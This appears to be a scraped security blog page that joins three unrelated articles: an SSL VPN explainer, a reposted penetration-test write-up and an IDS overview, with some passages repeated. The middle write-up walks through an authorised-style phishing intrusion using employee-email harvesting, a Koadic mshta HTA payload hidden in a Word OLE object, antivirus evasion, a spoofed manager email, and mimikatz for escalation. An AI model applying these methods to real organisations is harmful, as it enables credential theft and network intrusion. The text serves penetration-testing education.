Understanding SSL VPN

What if you are sitting in a hotel room, hundreds of miles away from your office and you need to access the intranet portal of your company? One of the solutions is to publish this portal on the web, so that all employees can access it from anywhere. Publishing all these applications directly on the web can expose the company to multiple security risks as they become accessible to everyone on the Internet. The most common practice adopted by enterprises in such a scenario is to use a VPN. In this article, we will discuss the working of SSL VPN, its key advantages and few concerns about it.

What if you are sitting in a hotel room, hundreds of miles away from your office and you need to access the intranet portal of your company? One of the solutions is to publish this portal on the web, so that all employees can access this application from anywhere. But often, there are multiple intranet applications used by different business groups of the company. Publishing all these applications directly on the web can expose the company to multiple security risks as they become accessible to everyone on the Internet. In addition, some of the applications may not be web-based.

The most common practice adopted by enterprises in such a scenario is to use a Virtual Private Network (VPN) . The two most used forms of VPNs are IPSEC VPN and SSL VPN. In this article, we will discuss the working of SSL VPN, its key advantages and few concerns about it.

What is "SSL VPN"

In a nut shell, Virtual Private Network (VPN) is a technology that allows creating a private or secure network over the public network, such as Internet. This is achieved by establishing a secure tunnel between the user’s machine and the enterprise network after authenticating the user. This enables the enterprises to provide access to the internal network for mobile employees without compromising on security. Secure VPN are one type of VPNs that use tunneling protocols with cryptographic capabilities. Secure Socket Layer (SSL) is one such protocol that is used to provide confidentiality and authenticity while communicating over Internet. As the name indicates, SSL VPN uses SSL protocol to secure the VPN tunnels.

How SSL VPN Works

Figure 1. SSL VPN setup of ABC Company

Figure 1 shows an SSL VPN setup of some ABC Company. myvpn.abc.com is an SSL VPN Gateway, which means, all the VPN connections from the internet will be accepted by this gateway, which in turn initiate connections to the internal application servers. Firewall-A protects the internal application servers and it allows connections only from SSL VPN gateway on the required application services. Firewall-B is the outside firewall and it is configured to allow any internet machine to connect to SSL VPN Gateway on SSL protocol (TCP/443). The purpose of this SSL VPN infrastructure is to provide secure access of application servers to the mobile employees of the company over internet.

Let’s consider John is a sales executive of this company who is currently out of office. John has access to internet and wants to access the web-based sales portal on the company’s intranet.

In order to connect to the intranet portal, John opens his internet browser and types https://myvpn.abc.com and connects to SSL VPN gateway. John is asked to provide his username and password by the gateway. Upon successful authentication, the gateway provides him the list of applications, which sales executives of the company need to access. John clicks on the sales portal application from the provided list. At the same time, gateway initiates connection to internal sales application server through firewall-A. When gateway receives response from the application server, it encapsulates that response with SSL and sends it over the connection established by John. Thus, the SSL VPN tunnel gets established between SSL VPN gateway and John’s machine. The key point here is that the SSL tunnel exists only upto the SSL VPN gateway and not up to Application Server.

While this mechanism works well for Web traffic, different SSL VPN vendors have used different approaches of implementation for non-web traffic. Let’s look at two of the most commonly used approaches.

Forwarding of Traffic sent to specific ports

The SSL VPN gateway transfers a script or an applet to the user’s machine that makes it to listen for requests to specific IP addresses and TCP/UDP ports, and when such requests are made, it intercepts them. It sends the contents of requests to the SSL VPN gateway via SSL VPN tunnel, after which SSL VPN gateway resends those requests to the actual destination on the internal network.

Establishing Network Connectivity over SSL

In order to establish the connection, the SSL VPN gateway transfers a small program (typically an ActiveX Control or Java applet) to the user’s machine and thereby creates a virtual network adapter on the user’s machine. It then assigns the user’s machine a private IP address and uses the SSL tunnel to establish a network connection between the company’s internal network and the user’s machine.

Figure 2. SSL packet with additional headers

As shown in figure 2, the packet created (by virtual network adapter) is encrypted using SSL and encapsulated by new headers and then sent over the public network,

Using SSL VPN for non-web traffic, users can access network shares, remote desktop and administrators can use SSH or telnet over SSL to manage their systems remotely.

Key Advantages

While discussing the pros and cons of SSL VPN, we mainly compare it with the other predominant VPN technology, which is IPSEC (IP Security) VPN. IPSEC is an encryption protocol that works at the network layer.

• Unlike IPSEC VPN, SSL VPN doesn’t require installation and configuration of client software at the user end. You just need an internet browser to use SSL VPN. This in turn provides flexibility to use SSL VPN from any platform – Mac OS X, Windows, UNIX or any device like PC, Web-enabled phones, PDAs, etc.
• SSL VPN solutions provide granular access control for the application. One can define which user groups have what level of access on which all applications.
• SSL uses TCP port 443, which is normally already opened on the firewall. It also helps remote users when they are sitting behind other company’s firewall. IPSEC uses specific UDP ports; If not in use, these ports are blocked by the firewall.

Few Concerns

• If SSL VPN is configured for non-web traffic, Viruses and Worms may infect the company’s internal network from an insecure public terminal.
• Third party searching tools (like Google desktop) cache the web pages served by SSL VPN gateway. This poses a serious security concern even for the people using SSL VPN, which erases temporary data after the completion of each SSL VPN session. Data cached by search tools – and index information created by such tools may persist in the search engine’s proprietary data stores.
• Hackers may bridge to corporate network through the SSL VPN user’s machine.

How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information

The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, asides, the company name, we were given “ZERO”information to perform an external black-box penetration Testing.

This  black-box external penetration Testing Performing with a by a client called(Hackme) 

OSINT 101

We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a number of open source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc from different public sources like search engines and shodan. There is an exhaustive list of such awesome tools here .

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization.

With Google dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” .

Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

From this, I noticed that employees emails followed a particular naming convention – the first letter of the firstname + surname @ domain.com i.e.rakinyele@hackme.com.

Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:

site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.

By hacking a script to automate the process, we copied out the firstnames, lastnames and the roles of the current employees of Hackme.

A tiring approach is to manually crawl through the google pages in search for these names and role or one could also use GoogleScraper:

Result : 

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.

then using your favorite word processor (word merge, notepad++, etc) or some good scriptful skills, merge the firstname + lastname – to form your email list.

Feed our Target list a Payload

Since we are simulating a black-box external attack, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme.

We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.

This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.

What made it really stand out asides the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables – using the “stager/js/mshta “module (serves payloads in memory using MSHTA.exe HTML Applications).

The result was a spawn of our HTA payload URL as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url“.

In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.

Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCC group have this implemented in Demiguise.

So here is our final payload saved as a .hta file.

The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
2. Get the user to open the word document and the embedded OLE object.
3. This spawns a new process and we get a shell access into our victim’s PC.

Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.

To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behavior. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

…and more recon

We need to know more about the target organization’s environment – specifically employees. The question we kept asking ourselves – what would interest the employees?

Where else to get this information than Glassdoor, a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of the target organization on Glassdoor, we found some common themes:

1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.
2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man’s heart is through his stomach. So what better way to get the employees to open our payload embedded word document?

Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with Hackme email signature while observing the organization email culture.

Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the response.

… recon again???

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway through sending our payload now. Have some patience and read on…

It’s time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like.

I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.

Then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.

Change the icon to Microsoft Word’s icon and also, change the caption to reflect your message.

Don’t Forget the Anti-virus!!!

To check the AV detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.

AV Scan of our .hta payload (0 detections)

It’s Time to Send our Email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address.

In this case, I created a Gmail account (yes, Gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

What next?

The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.

In conclusion

All in all, this was a very fun engagement. Whilst it may take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level. It can be fairly easy for one to gain access by exploiting the human factor.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said.

Original Source & Credits: 

Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.

Disclaimer

All the Content of this Article Belongs to above Original Author. “www.computernetworksecuritis.blogspot.in” won’t take any credits.This article is only for an Educational purpose.Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question.

The “Author” and “www.computernetworksecuritis.blogspot.in” will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law. Reproduce This Content Without Permission is Strictly Prohibited.

Intrusion-Detection-System (IDS) And Its Detailed Working Function -SOC/SIEM

Intrusion detection system (IDS) gathers and analyzes information from within a computer or network to identify unauthorized access, misuse, and possible violations.

IDS also can be referred as a packet sniffer which intercepts packets travel along various communication mediums.All the packets are analyzed after they captured.

HOW IDS WORKS

The main purpose of IDS are they not only prevent intrusion but they also alert administrators immediately when the attack going on.

• IDS having sensors to detect signatures, some advanced IDS having a behavioral activity to determine malicious behaviors. Even if the signature doesn’t match this system can notify the behavior of attack.
• If the signature match it will move to next step or the connections cut down from source IP, the packet is dropped and an alarm notifies the administrator.
• Once the signature is matched, then sensors pass on anomaly detection, whether the received packet or request matches or not.
• If the packet passes anomaly stage, a stateful protocol analysis will be done. After that, through switch, the packets are passed on the network.If anything mismatches again, the connections are cut down from the source IP address and the packet is dropped, also an alarm will be raised and notified to the administrator.

WAYS TO DETECT AN INTRUSION 

Intrusion can be identified in three ways.

Signature Detection:

It is also known as misuse detection, it tries to identify the events that indicate an abuse of the system.It is achieved by creating models of intrusions.

Incoming events are compared with the intrusion models for detection and decision.While making signature the model should detect the incoming intrusion without making any impact to regular traffic, only malicious traffic should match the model or else the false alarm will be raised.

• The simplest form of signature reorganization uses simple patterns matching to compare the network packets against binary signatures of known attacks. Binary signature defined as the specific portion of the packet such as TCP flags.
• Signature recognization can find known attacks, But there is a possibility other packets that match the same signature will trigger bogus signals.Signatures need to be customized.
• A signature that termed improperly may trigger bogus signals, the bandwidth of the network is consumed with the increase in the signature database.
• Despite problems with signature-based intrusion detection, such systems are popular and work well when configured correctly and monitored closely.

Anomaly Detection

It is termed as “not-use detection” and it differs from the signature recognization model. The model consists of a database of Anomalies. Any event that is identified with the database is called an anomaly.Any deviation from the normal use is considered as Attack.

• In this traditional method, important data is kept for checking in various network traffic model.However, in reality, there is less variation in network traffic and too many statistical variations making these models imprecise.
• In this type of approach, the inability to instruct a model thoroughly on the normal network is of grave concern.

Protocol Anomaly detection

This technique based on the anomalies specific to a protocol, this model integrated with IDS recently.This identifies TCP/IP specific flaws with network. Protocols are created with specifications, know as RFCs(RFC1192) for dictating proper use and communication.

• There are new attack methods and exploits that violate protocol standards being discovered frequently.
• The pace at which the malicious signature attacker is growing is incredibly fast. But the network protocol, in comparison, is well defined and changing slowly. Therefore, the signature database must be updated frequently to detect attacks.
• Protocol anomaly detection systems are easier to use because they require no signature updates.
• The best way to present alarms is to explain which part of the state system was compromised. For this, the IDS operators have to have a thorough knowledge of the protocol design; the best way is the documentation provided by the IDS.

TYPES OF INTRUSION DETECTION

• Network based intrusion detection
• Host based intrusion detection
• Log file monitoring
• File Integrity Check.

Network based Intrusion

NIDS check’s every packet entering into the network for anomalies and incorrect data.Unlike firewall that is confined to be filtering packets malicious packets, IDS inspects every packet thoroughly.

An NIDS captures and inspects all the traffic regardless of it permitted. Based on the content, either the application or IP level, an alert is generated.

Network based intrusion systems tend to be more distributed than host-based. NIDS is designed basically to identify the anomalies in the network and the host level.

It audits information contained in data packets and logs information of malicious packets.

A threat level is assigned to each packet after the data packet received.These mechanisms typically consist of a black box that is placed on the network in the promiscuous mode, listening for patterns indicative of an intrusion.

Host based Intrusion

In the host-based system, the IDS analyzes each system’s behavior. The HIDS can be installed on any system ranging from a desktop PC to a server. The HIDS is more versatile than the NIDS.

One example of a host-based system is a program that operates on a system and receives an application or operating system audit logs.

These programs are highly effective for detecting insider abuses. If one of the users attempt unauthorized activity then the host based system logs and collect the most pertinent information promptly.

In addition to detecting unauthorized insider activity, host-based systems are also effective at detecting

These programs are highly effective for detecting insider abuses. If one of the users attempt unauthorized activity then the host based system logs and collect the most pertinent information promptly.

In addition to detecting unauthorized insider activity, host-based systems are also effective at detecting unauthorized file modification.

HIDSes are more focused on changing aspects of the local systems.HIDS is also more platform-centric, with more focus on the Windows OS, but there are other HIDSes for UNIX platforms. These mechanisms usually include auditing for events that

These mechanisms usually include auditing for events that occur on a specific host. These are not as common, due to the overhead they incur by having to monitor each system event.

Log File Monitoring

A Log File Monitor (LFM) monitors log files created by network services. The LFT IDS searches through the logs and identifies malicious events.

In a similar manner to NIDS, these systems look for patterns in the log files that suggest an intrusion.These mechanisms are typically programs that parse log files after an event has already occurred, such as failed login attempts.

File Integrity Check

These mechanisms check for Trojan horses, or files that have otherwise been modified, indicating an intruder has already been there.

IDS PENTESTING

1. Perform a Time-To-Live attack.
2. Perform the invalid RST packets technique.
3. Perform the urgency flag technique.
4. Perform the polymorphic shellcode technique.
5. Perform the ASCII shellcode techyte,nique.
6. Perform Application-layer attacks.
7. Perform encryption and flooding techniques.
8. Perform a post-connection SYN attack.
9. Perform a pre-connection SYN attack.

4 Best Intrusion Detection Systems

• Snort

• Bro Intrusion Detection System

• Cisco Intrusion Prevention System (IPS)

• Juniper Networks Intrusion Detection & Prevention (IDP)

Snort

Snort  is an open source network intrusion prevention and detection system (IDS/IPS) created by Martin Roesch and put out by Sourcefire (acquired by Cisco in 2013).

The best deal for the money (it’s free). It does an amazing job of combining the benefits of signature, protocol, and anomaly-based inspection. Snort is without a doubt the most widely deployed IDS/IPS technology across the globe. With millions of downloads and approximately 300,000 registered users.

Bro Intrusion Detection System

Bro is an open-source, Unix-based Network Intrusion Detection System (NIDS) that passively monitors network traffic and looks for suspicious activity.

Bro detects intrusions by first parsing network traffic to extract its application-level semantics and then executing event-oriented analyzers that compare the activity with patterns deemed troublesome.

Its analysis includes detection of specific attacks (including those defined by signatures, but also those defined in terms of events) and unusual activities (for example, certain hosts connecting to certain services, or patterns of failed connection attempts).

Cisco Intrusion Prevention System (IPS)

Besides being one of the most expensive, Cisco IPS is one of the most widely deployed intrusion prevention systems thanks to its acquisition of Surefire. The company’s Firepower network security appliances are based on Snort.

Cisco offers:

Protection against more than 30,000 known threats, Timely signature updates, and Cisco Global Correlation to dynamically recognize, evaluate, and stop emerging Internet threats

Cisco IPS includes industry-leading research and the expertise of Cisco Security Intelligence Operations.

Cisco IPS protects against increasingly sophisticated attacks, including Directed attacks, Worms, Botnets, Malware, Application abuse.

• Juniper Networks Intrusion Detection & Prevention (IDP)

Juniper Networks IDP Series Intrusion Detection and Prevention Appliances with Multi-Method Detection (MMD), offers an impressive comprehensive coverage by leveraging multiple detection mechanisms.

For one example, by utilizing signatures, as well as other detection methods including protocol anomaly traffic anomaly detection, the Juniper Networks IDP Series appliances can thwart known attacks as well as possible future variations of the attack.